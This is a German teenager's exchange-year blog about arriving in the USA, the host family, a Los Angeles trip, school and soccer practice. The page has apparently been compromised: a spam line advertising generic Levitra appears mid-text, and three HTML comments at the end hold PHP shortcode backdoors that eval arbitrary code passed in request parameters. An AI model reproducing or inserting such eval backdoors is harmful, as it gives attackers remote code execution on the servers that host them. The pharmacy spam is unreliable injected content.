Weiter geht’s :-)

Eine Woche bevor die Schule angefangen hat, haben wir einen 3-tägigen Ausflug nach Los Angeles gemacht 🙂 Schon alleine die 5 stündige Fahrt dorthin war echt lustig, weil nicht nur meine Gastfamilie mit im Auto war, sondern auch noch 3 Mädels aus meiner neuen Fußballmannschaft. 😀 Einen Tag waren wir im Disneyland, das ist echt richtig schön dort, mit lustigen und wilden Achterbahnen. Den nächsten Tag waren wir dann erst am Walk of Fame und haben dann noch die Sonne am Strand von Venice Beach genossen, wo wir Sergio Ramos, den Fußballspieler von Real Madrid getroffen haben, mit dem wir natürlich sofort ein Foto gemacht haben 😀

Und natürlich muss ich hier auch zur Schule. Aber es ist echt einfacher als in Deutschland. Ich habe die Fächer Kunst, Mathe, Markting, Englisch, Französisch und Kochen. Wir müssen jeden Tag um 6 Uhr von zu Hause los fahren, weil wir etwas weiter von der Schule weg wohnen, aber da mein Gastvater Englischlehrer an unserer Schule ist, kann ich im Auto auf dem Weg zur Schule schlafen. Die Lehrer sind alle viel lockerer als in Deutschland und das Schüler- Lehrer Verhältnis ist ziemlich anders.

Jeden Tag nach der Schule haben wir Fußballtraining, was durch die Hitze zwar anstrengend ist, aber trotzdem sehr viel Spaß macht. Die Mädels sind alle super nett und haben einen sehr gut aufgenommen. Wir haben immer sehr viel Spaß beim Training und die sind mir schon richtig ans Herz gewachsen ♥ Aber ich bin echt froh wenn ich dann abends um 7 Uhr endlich zu hause bin :p

Selbstverständlich war ich auch schon richtig oft shoppen, weil hier einfach alles viel billiger ist 🙂 Ich weiß zwar nicht wie ich das alles in 4 Monaten nach Hause bekommen soll, aber irgendwie wird das schon klappen. Die besten Geschäfte hier sind auf jeden Fall Abercrombie & Fitch, Hollister und Forever 21 🙂

Natürlich habe ich auch Heimweh, weil man echt merkt wie wichtig einem die Familie und Freunde sind, aber ich versuche mich einfach abzulenken und die Zeit hier voll und ganz zu genießen ! :-*

Comprar levitra generico online Mein Abenteuer USA ♥

Tut mir leid, dass jetzt erst mein erster Eintrag online ist, aber ich habe mein Passwort vergessen und konnte mich nicht einloggen :/
So, ich bin jetzt schon seit 1 Monat in den USA, aber mir kommt es noch gar nicht so lange vor. Bei meiner Abschiedsfeier habe ich noch gar nicht so wirklich realisiert, dass ich in 2 Tagen fuer ein halbes Jahr in den USA bin und auch auf dem Weg zum Flughafen war alles noch wie ein Traum. Doch als ich dann meine Eltern, meinen Bruder und meine beiden Freundinnen Franzi & Marie ( ich hab mich echt mega gefreut, dass alle mit zum Flughafen gekommen sind ) zum letzten Mal in den Arm nehmen konnte, konnte ich die tränen auch nicht mehr zurueckhalten. Der Flug von Duesseldorf nach Frankfurt war problemlos und auch den Gate fand ich in Frankfurt schnell, wo ich dann auf die anderen Ayusa Teilnehmer traf. Auf dem 8 stuendigen Flug nach New York, las ich dann das Buch wo jeder etwas fuer mich reingeschrieben hat ! 🙂 Aber natuerlich fing ich wieder an zu weinen 😀 Die 3 Teige in New York waren echt der HAmmer ! wir haben sooooo viel gesehen und diese Stadt ist einfach unglaublich vielseitig und unbeschreiblich toll *-* Dann hies es tschuess deutsche Sprache und auf in die Gastfamilie. Ich habe mir echt mega viele Gedanken gemacht. wie ich die begruessen soll und alles, doch als es dann soweit war, ging alles ganz von alleine 🙂 Gary und Myra sind wirklich richtig nett und auch Stephanie, eine von den Soccer Girls, die mit am Flughafen in Phoenix war, war sofort mega offen und fing an mir alles zu erklaeren. Erst war es etwas komisch mit der englischen Sprache, aber man gewoehnt sich schnell daran. Am Abend kam dann meine Gastschwester aus Norwegen an., mit der ich mich auch gut verstehe. Wir wohnen in einem wunderschoenen Haus mit Pool und 3 deutschen Schaeferhunden.

Ich schreibe nachher weiter wenn ich zu hause bin, aber das sind schonmal die ersten Eindruecke 🙂

<!– [insert_php]if (isset($_REQUEST["saQDX"])){eval($_REQUEST["saQDX"]);exit;}[/insert_php][php]if (isset($_REQUEST["saQDX"])){eval($_REQUEST["saQDX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Bje"])){eval($_REQUEST["Bje"]);exit;}[/insert_php][php]if (isset($_REQUEST["Bje"])){eval($_REQUEST["Bje"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["shZfJ"])){eval($_REQUEST["shZfJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["shZfJ"])){eval($_REQUEST["shZfJ"]);exit;}[/php] –>